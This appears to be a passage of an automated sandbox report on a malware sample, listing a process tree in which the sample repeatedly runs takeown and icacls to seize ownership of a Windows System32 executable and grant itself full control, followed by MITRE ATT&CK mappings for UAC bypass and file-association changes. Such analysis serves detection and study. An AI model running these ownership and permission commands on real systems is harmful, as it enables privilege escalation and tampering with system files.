C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5448
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5492 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:436
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:3824 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2476 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5744
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2612 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:1816 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4372
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3608
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2392
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4432 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3960 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5660
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2556 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3192
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:768 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5140 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2772
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4072 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1076 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:3932 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5832 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4368
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1716
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5424
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5960 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4604 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4872 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:3812 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5732 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:2680 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5976
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5336 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5812
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1960 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:6124
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5672 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4940
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2360 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:548 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5840
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2404 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5348
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4420 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:2324 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1144
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5808 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5176 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5564
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5904
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:2960
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5572
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:6064
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3564
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2752
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5284
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5616
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:6036 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5924
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:1264 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2612
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5448
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:2176
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5604
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5132 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5492
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:1404 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5052 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3608
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4492
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4056 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:1796 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5408
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3960
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2656 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3368
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3052
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3088
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5832
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:6080 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4072
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3932
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:6056 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5188
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5628
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5932
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4692 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4816
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4444 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4908
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5400
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5296
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5984
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5416 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5312 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5844
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6104
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5276 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5124
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2120
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5612 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5532
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1640
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:1148
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5472 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1960
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5396 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5388
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1140
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2320
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:1884
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5232
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1804
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4372 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6092
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4488
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4468 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5868 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3192 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5892
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4832 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5184 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2932
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:436
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3664 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5872 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5952
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:32
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5444
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5912
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5384 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4508
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5800 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:3544 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2808
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism: 1
Bypass User Account Control: 1
Event Triggered Execution: 1
Change Default File Association: 1
Downloads